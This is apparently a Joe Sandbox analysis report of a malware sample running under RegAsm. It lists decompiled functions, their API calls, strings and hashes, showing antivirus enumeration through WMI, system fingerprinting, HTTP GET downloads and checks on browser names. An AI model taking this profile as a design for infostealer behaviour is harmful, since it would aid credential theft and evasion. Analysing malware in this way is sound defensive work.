Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
lstrcat.KERNEL32(00000000,00425BEC), ref: 00406BCD
lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
lstrcat.KERNEL32(00000000,00425BF0), ref: 00406BED
lstrlenA.KERNEL32(00000000), ref: 00406D34
lstrlenA.KERNEL32(00000000), ref: 00406D42

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

memset.MSVCRT ref: 00406D9A
DeleteFileA.KERNEL32(00000000), ref: 00406DBF

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
String ID:
API String ID: 4187064601-0
Opcode ID: 47bce4dc3fb733c9b6d78473bdab5d53f7b6074c1abf59a6ddf3214f831295d2
Instruction ID: 623c21351db5d7502ddbdcae5b6d8d47bff6a1d16c2b78033439981e25a1e23c
Opcode Fuzzy Hash: 47bce4dc3fb733c9b6d78473bdab5d53f7b6074c1abf59a6ddf3214f831295d2
Instruction Fuzzy Hash: 3F224871904248EADF15EBE4DD56AEEBB75AF18308F50407EF402721D2DF782A09DB26

Function 0041077C Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00410781
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
VariantInit.OLEAUT32(?), ref: 00410855

Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752

FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 00410893
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory), ref: 004108A0
VariantClear.OLEAUT32(?), ref: 004108E2
wsprintfA.USER32 ref: 004108CC

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Strings

Unknown, xrefs: 004108EE
Select * From Win32_OperatingSystem, xrefs: 0041080A
Unknown, xrefs: 0041090D
Unknown, xrefs: 00410914
WQL, xrefs: 0041080F
ROOT\CIMV2, xrefs: 004107D7
%d/%d/%d %d:%d:%d, xrefs: 004108C6
InstallDate, xrefs: 00410867

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2456697202-461178377
Opcode ID: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
Instruction ID: 9d86073096b1dc3cc792ac086ea264928f3f197bf5d8e0195c0b1cef05d7c5cd
Opcode Fuzzy Hash: 6bbc65757a9dd392a9b543c355a983862ea0ffb6972efa9a5f29065882e5d019
Instruction Fuzzy Hash: 8D514B71A01228BFCB20DB95DC49EEFBB7CEF49B10F504116F515E6190D7B85A41CBA8

Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00404F2F

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
StrCmpCA.SHLWAPI(?), ref: 00404FA6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
InternetCloseHandle.WININET(00000000), ref: 004050DD
InternetCloseHandle.WININET(?), ref: 004050E6
InternetCloseHandle.WININET(?), ref: 004050EF

Strings

GET, xrefs: 00404FF7
ERROR, xrefs: 00405059
ERROR, xrefs: 00405140

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 2435781452-2509457195
Opcode ID: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
Instruction ID: 4f8882304835992de02ce188a42af96545f0e5a020f056082c0570d921596d9d
Opcode Fuzzy Hash: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
Instruction Fuzzy Hash: BF513F71900119AFEB11EBE0DC85FEEBBB9EB09744F10403AF605B2191DB795E488BA5

Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004041B7

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
RtlAllocateHeap.NTDLL(00000000), ref: 00404205
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
StrCmpCA.SHLWAPI(?), ref: 00404238
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
InternetCloseHandle.WININET(00000000), ref: 00404369
InternetCloseHandle.WININET(?), ref: 00404372
InternetCloseHandle.WININET(?), ref: 0040437B

Strings

GET, xrefs: 0040428A

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 1687531150-1805413626
Opcode ID: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
Instruction ID: 70797dbb62b7227b97fb4dad1cf9611d4221403ee57f1c0e2ca818baf810037a
Opcode Fuzzy Hash: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
Instruction Fuzzy Hash: DB516EB2900219AFDF10EFE0DC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65

Function 00410925 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0041092A
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
VariantInit.OLEAUT32(?), ref: 004109F6

Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000), ref: 00410C95
Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

VariantClear.OLEAUT32(?), ref: 00410A2B

Strings

WQL, xrefs: 004109B8
Unknown, xrefs: 00410A56
Unknown, xrefs: 00410A37
Select * From AntiVirusProduct, xrefs: 004109B3
displayName, xrefs: 00410A08
root\SecurityCenter2, xrefs: 00410980
Unknown, xrefs: 00410A5D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3694693100-315474579
Opcode ID: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
Instruction ID: eaee24b4b2737a5a762c4e74348500a03556ab89a27190f447ac073c3fdbdc8f
Opcode Fuzzy Hash: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
Instruction Fuzzy Hash: 5A418E70A01229BFCB20DB95DD49EEF7F79EF49B60F60411AF115A6180C7B85A41CBE8

Function 00410071 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410076

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
wsprintfA.USER32 ref: 00410132
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
lstrlenA.KERNEL32(?), ref: 0041018E
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Strings

- , xrefs: 00410218
%s\%s, xrefs: 0041012C
?, xrefs: 004100B4

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 404191982-3278919252
Opcode ID: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
Instruction ID: 7ab7514c44e0da1f2f7805acf3a1e45dd26abe84cf75324248915fb0e6202ea1
Opcode Fuzzy Hash: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
Instruction Fuzzy Hash: 087102B190021DEEDF11EBE1CD84EEEBBB9BB18304F50417AE905B2151DB785A88CB65

Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004104E2
GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
wsprintfA.USER32 ref: 004105AD
lstrcat.KERNEL32(00000000,004262A0), ref: 004105BC

Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3

lstrlenA.KERNEL32(00000000), ref: 004105DB

Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172

lstrcat.KERNEL32(00000000,00000000), ref: 00410608

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Strings

C, xrefs: 0041050F
:\, xrefs: 0041052D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 688099012-3309953409
Opcode ID: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
Instruction ID: 84e118196ac0f38cbb6e09dfb40efd972d04435529832d229da92da0b26732ed
Opcode Fuzzy Hash: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
Instruction Fuzzy Hash: 8E418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA785A48CBB5

Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041311D

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
lstrlenA.KERNEL32(00000000), ref: 004131B6

Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
lstrlenA.KERNEL32(00000000), ref: 004131F2
lstrlenA.KERNEL32(00000000), ref: 0041320D

Strings

ERROR, xrefs: 0041321D
ERROR, xrefs: 00413238
ERROR, xrefs: 00413231
ERROR, xrefs: 00413191
ERROR, xrefs: 0041323F

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3807055897-1526165396
Opcode ID: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
Instruction ID: 555d10d1ffafafdd123518b884250a5375e6a4b62cd9d48d02a2f87644db10f1
Opcode Fuzzy Hash: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
Instruction Fuzzy Hash: 7141A6B1900258EACB11FFA1D956FDDB7B4AF18708F10007FE90173182DB386B488A6A

Function 0040ED08 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040ED0D
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF

Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4

StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
StrCmpCA.SHLWAPI(00000000), ref: 0040F025
StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140

Strings

Stable\, xrefs: 0040EE08
firefox, xrefs: 0040F132
Stable\, xrefs: 0040F068

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
